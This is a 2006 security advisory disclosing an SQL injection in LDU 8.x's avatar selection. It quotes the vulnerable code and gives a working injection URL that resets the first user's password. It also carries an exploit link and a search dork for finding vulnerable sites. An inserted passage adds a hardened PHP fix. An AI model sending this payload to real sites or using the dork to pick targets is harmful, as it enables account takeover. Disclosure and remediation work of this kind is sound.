Advisory: LDU <= 8.x Remote SQL Injection Vulnerability.

Date: Tue, 21 Nov 2006 23:03:56 -0600
From: Mustafa Can Bjorn IPEKCI <nukedx@nukedx.com.>
To: [email protected], [email protected],
Subject: Advisory: LDU <= 8.x Remote SQL Injection Vulnerability.

--Security Report--
Advisory: LDU <= 8.x Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/10/06 09:44 PM
---
Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}
---
Vendor: Neocrome (http://www.neocrome.net)
Version: 8.x; prior versions must also be affected.
About: Via this method a remote attacker can manipulate the SQL query and
change everything in LDU's user database. The vulnerable code can be found
in profile.inc.php at lines 142-150.

-Source in system/core/profile/profile.inc.php-
142: case 'avatarselect':
143: /* ============= */
144:
145: ldu_check_xg();
146: $avatar = $cfg['av_dir'].urldecode($id);
147: if (file_exists($avatar))
148: { $sql = ldu_query("UPDATE $db_users SET user_avatar='$avatar' WHERE user_id='".$usr['id']."'"); }
149:
150: break;
-End of source-

As you can see, the "id" parameter is not sanitized properly and is passed
through the urldecode() function, which decodes id's value, so a remote
attacker can bypass magic_quotes_gpc and other functions that escape '
characters. In avatarselect LDU checks that the file is available with the
file_exists function, and urldecode helps us here by way of a null byte.
A demonstration exploit is given in the How&Example part.
Level: Highly Critical
---
How&Example:
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/*
With this example the remote attacker changes the password of LDU's first user to 123456.
The XVALUE comes with your avatarselect link; it is specific to every user in LDU.
To use this vulnerability you must be logged in to LDU...
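A hardened version of the quoted 'avatarselect' branch, added here as an example and not LDU's or the author's code: it drops the second urldecode(), allow-lists the file name, confines it to the avatar directory and binds the value with a prepared statement. $cfg['av_dir'], $db_users and $usr['id'] are the advisory's names; validate_avatar_id(), set_user_avatar() and the scratch directory are assumptions of this example.

```php
<?php
// Added example, not LDU's code: a hardened 'avatarselect' branch.
// $cfg['av_dir'], $db_users and $usr['id'] are the advisory's names;
// validate_avatar_id() and set_user_avatar() are hypothetical helpers.
declare(strict_types=1);
// Return the path to store, or null when the value is rejected.
function validate_avatar_id(string $raw, string $avDir): ?string
{
    // PHP already URL-decoded $_GET once. The second urldecode() in the
    // original turned %2527 into a quote after magic_quotes_gpc had run,
    // and %2500 into the NUL that truncated the file_exists() check.
    // No re-decoding here, and only a bare image file name is accepted.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.(gif|png|jpe?g)\z/', $raw)) {
        return null;
    }
    $base = realpath($avDir);
    $path = realpath($avDir . $raw);
    // The file must exist and resolve directly inside the avatar directory.
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return $avDir . $raw;
}

// The avatar value is bound as data; it never becomes part of the SQL text.
function set_user_avatar(mysqli $db, string $table, int $userId, string $avatar): bool
{
    // Identifiers cannot be bound, so the table name is checked separately.
    if (!preg_match('/\A[A-Za-z0-9_]+\z/', $table)) {
        return false;
    }
    $stmt = $db->prepare("UPDATE `$table` SET user_avatar = ? WHERE user_id = ?");
    $stmt->bind_param('si', $avatar, $userId);
    return $stmt->execute();
}

// Constructed demo: a scratch avatar directory holding one real file.
$avDir = sys_get_temp_dir() . '/ldu_avatars/';
@mkdir($avDir);
touch($avDir . 'default.gif');
$samples = [
    // The advisory's id value as PHP hands it to the script (decoded once).
    'default.gif%00%27,user_password=%27HASH%27/**/where/**/user_id=1/*',
    '../../index.php',
    'default.gif',
];
foreach ($samples as $s) {
    $r = validate_avatar_id($s, $avDir);
    echo ($r === null ? 'rejected: ' : 'accepted: ') . $s . PHP_EOL;
}
```

In the handler the two calls would be chained: validate_avatar_id($_GET['id'] ?? '', $cfg['av_dir']) and, only on a non-null result, set_user_avatar($db, $db_users, (int) $usr['id'], $avatar). Only the last sample is accepted; the first two are rejected before any filesystem or database call.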
Timeline:
* 21/10/2006: Vulnerability found.
* 21/10/2006: Contacted with vendor and waiting reply.
---
Original advisory: http://www.nukedx.com/?viewdoc=51
---
Exploit:
http://www.nukedx.com/?getxpl=51
---
Dorks: "Powered by LDU"